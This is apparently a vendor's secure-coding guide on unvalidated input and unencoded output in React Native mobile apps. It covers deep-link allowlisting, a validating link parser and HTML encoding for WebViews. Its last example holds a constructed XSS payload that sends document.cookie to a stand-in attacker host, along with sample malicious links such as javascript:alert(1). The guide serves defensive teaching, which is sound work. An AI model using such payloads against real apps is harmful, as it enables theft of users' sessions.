Severity: medium | CWE-20 | OWASP Mobile Top 10 M4:2024

Insufficient Input/Output Validation

Mobile apps that do not validate incoming input, or do not encode data before rendering it, are vulnerable to injection attacks, data corruption, and unexpected behavior.

How It Works

Mobile apps receive input from many sources: text fields, deep links, QR codes, the clipboard, and inter-app communication (intents, custom URL schemes, app links). None of these can be trusted, because any other app or web page on the device can supply them. Without validation, malicious input can cause SQL injection in local databases, cross-site scripting in WebViews, path traversal in file operations, or crashes from malformed data. Output handling matters just as much: rendering unencoded data in a WebView lets it execute as JavaScript, and forwarding an unchecked deep link to the navigator lets the link author choose which screen the user lands on.

Vulnerable Code

// Deep link handler without validation: whatever path the link carries is
// handed straight to the navigator, so any app, web page or QR code that can
// open a URL picks the screen. `navigation` is assumed to be in scope.
import { Linking } from 'react-native';

Linking.addEventListener('url', ({ url }) => {
  const path = new URL(url).pathname;
  navigation.navigate(path);
});

Secure Code

// Deep link handler with validation: only routes on the allowlist are
// navigable, and a malformed URL is dropped instead of throwing inside
// the handler. `navigation` is assumed to be in scope.
import { Linking } from 'react-native';

const ALLOWED_ROUTES = ['/home', '/profile', '/settings'];

Linking.addEventListener('url', ({ url }) => {
  let path;
  try {
    path = new URL(url).pathname;
  } catch {
    return; // unparsable link: ignore it
  }
  if (ALLOWED_ROUTES.includes(path)) {
    navigation.navigate(path);
  }
});
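The allowlist above only checks the path. Real deep links also carry a scheme, a host and query parameters, and each of those is attacker-controlled. The following is an added example, not code from the original page: a parser that checks scheme, host, route and every query parameter before anything is navigated to. The `myapp:` scheme, the `open` host, the route names and the parameter rules are assumptions made for the example.

```javascript
// Added example, not code from the original page. A deep-link parser that
// checks scheme, host, route and query parameters before navigation. The
// "myapp:" scheme, the "open" host, the route names and the parameter rules
// are assumptions made for this example.

// Allowlisted routes, each with a validator per accepted query parameter.
// Unknown routes and unknown or malformed parameters are rejected outright.
const ROUTES = {
  "/home": {},
  "/profile": { id: (v) => /^\d{1,10}$/.test(v) },                 // numeric id only
  "/settings": { tab: (v) => ["account", "privacy"].includes(v) }, // fixed set
};

const ALLOWED_SCHEME = "myapp:";
const ALLOWED_HOST = "open";

// Returns { route, params } for an acceptable link and null for everything
// else. It never throws: a malformed URL is treated like any other bad input.
function parseDeepLink(raw) {
  let url;
  try {
    url = new URL(String(raw));
  } catch {
    return null; // e.g. "not a url"
  }

  // Scheme and host first: "https://evil.example/home" and
  // "javascript:alert(1)" never reach the route check.
  if (url.protocol !== ALLOWED_SCHEME || url.host !== ALLOWED_HOST) return null;

  // Decode once, collapse repeated slashes, drop a trailing slash, then
  // require an exact allowlist match. No prefix matching, no case folding.
  let path;
  try {
    path = decodeURIComponent(url.pathname);
  } catch {
    return null; // bad percent-encoding such as "%zz"
  }
  path = path.replace(/\/+/g, "/").replace(/\/(?=$)/, "") || "/";
  if (!Object.prototype.hasOwnProperty.call(ROUTES, path)) return null;

  // Every parameter must be expected for this route and pass its validator.
  const schema = ROUTES[path];
  const params = {};
  for (const [key, value] of url.searchParams) {
    const check = Object.prototype.hasOwnProperty.call(schema, key) ? schema[key] : null;
    if (!check || !check(value)) return null;
    params[key] = value;
  }
  return { route: path, params };
}

// How the handler would use it in the app (`navigation` assumed in scope):
//   Linking.addEventListener('url', ({ url }) => {
//     const link = parseDeepLink(url);
//     if (link) navigation.navigate(link.route, link.params);
//   });

// Constructed sample links, the kind a QR code or a malicious app could deliver.
const SAMPLE_LINKS = [
  "myapp://open/profile?id=42",               // accepted
  "myapp://open/settings?tab=privacy",        // accepted
  "myapp://open/home/",                       // accepted: trailing slash removed
  "myapp://open/profile?id=42%27%20OR%201=1", // rejected: id is not numeric
  "myapp://open/profile?id=7&debug=1",        // rejected: unknown parameter
  "myapp://open/admin",                       // rejected: not on the allowlist
  "myapp://evil/home",                        // rejected: wrong host
  "https://evil.example/home",                // rejected: wrong scheme
  "javascript:alert(1)",                      // rejected: wrong scheme
  "not a url",                                // rejected: unparsable
];

for (const link of SAMPLE_LINKS) {
  console.log(link, "->", JSON.stringify(parseDeepLink(link)));
}
```

The parser returns a structured result rather than the raw path, so the navigator only ever sees values that have already passed a validator. Rejected links are dropped silently; logging them is a useful detection signal, but the handler should never try to "repair" a link it did not accept.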

Real-World Example

A vulnerability reported in 2021 in the TikTok Android app allowed attackers to craft deep links that could steal user sessions. The app did not validate deep link parameters, so a crafted link could inject JavaScript through a WebView component.

How to Prevent It

  • Validate all input from deep links, QR codes, and intents: scheme, host, path, and every parameter
  • Use allowlists for navigation routes; reject anything not on the list rather than trying to clean it up
  • Encode data for the context it lands in (HTML text, attribute, URL) before rendering it in a WebView, and keep JavaScript disabled in WebViews unless a screen needs it
  • Use parameterized queries for local databases instead of building SQL by string concatenation
  • Validate data types, lengths, and ranges on all user input, and fail closed on anything malformed
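Input validation covers the front door; the WebView bullets above are about the back door, where data that was validated on the way in is still rendered as markup on the way out. The following is an added example, not code from the original page: untrusted data (a display name that could have arrived through a deep-link parameter or a synced profile) is encoded before it is placed into HTML that a WebView renders, and a link target is validated as a URL because encoding alone does not stop a `javascript:` href. The `source` and `javaScriptEnabled` props are react-native-webview's real prop names; the surrounding screen code and the attacker payload are constructed for the example.

```javascript
// Added example, not code from the original page. Output encoding for data
// rendered in a WebView, plus URL validation for link targets. The payload
// and the screen code are constructed; react-native-webview's "source" and
// "javaScriptEnabled" props are the library's real prop names.

// Encode the characters that can change meaning in HTML text and
// double-quoted attribute contexts. This is output encoding, not a filter:
// the data is preserved, it just cannot break out of its context.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Vulnerable: the value is concatenated straight into markup, so a name
// containing a tag or an event handler becomes code in the WebView.
function renderUnsafe(displayName) {
  return `<p>Hello, ${displayName}</p>`;
}

// Safe: the same template, but the value is encoded for the text context.
function renderSafe(displayName) {
  return `<p>Hello, ${escapeHtml(displayName)}</p>`;
}

// Encoding alone is not enough for a URL attribute: "javascript:alert(1)"
// survives escapeHtml untouched, so the href is validated as an https URL
// first and the label is encoded for the text context. Returns null on reject.
function renderLinkSafe(href, label) {
  let parsed;
  try {
    parsed = new URL(String(href));
  } catch {
    return null;
  }
  if (parsed.protocol !== "https:") return null;
  return `<a href="${escapeHtml(parsed.href)}">${escapeHtml(label)}</a>`;
}

// Constructed payload of the kind an attacker would plant in a profile
// field; it needs no <script> tag, an event handler attribute is enough.
const PAYLOAD = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Props for react-native-webview: render the encoded markup and leave
// JavaScript off unless the screen genuinely needs it.
function webViewProps(displayName) {
  return {
    source: { html: renderSafe(displayName) },
    javaScriptEnabled: false,
  };
}

// Stand-alone demonstration.
console.log("unsafe:", renderUnsafe(PAYLOAD));
console.log("safe:  ", renderSafe(PAYLOAD));
console.log("link:  ", renderLinkSafe("javascript:alert(1)", "click"));
```

`renderLinkSafe` is the caveat worth remembering: `escapeHtml` makes a value inert in a text node or a quoted attribute, but an `href`, `src` or `javascript:`-capable attribute needs the value validated as a URL of an allowed scheme before it is encoded.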

Affected Technologies

Mobile, React Native, Flutter

Data Hogo detects this vulnerability automatically.

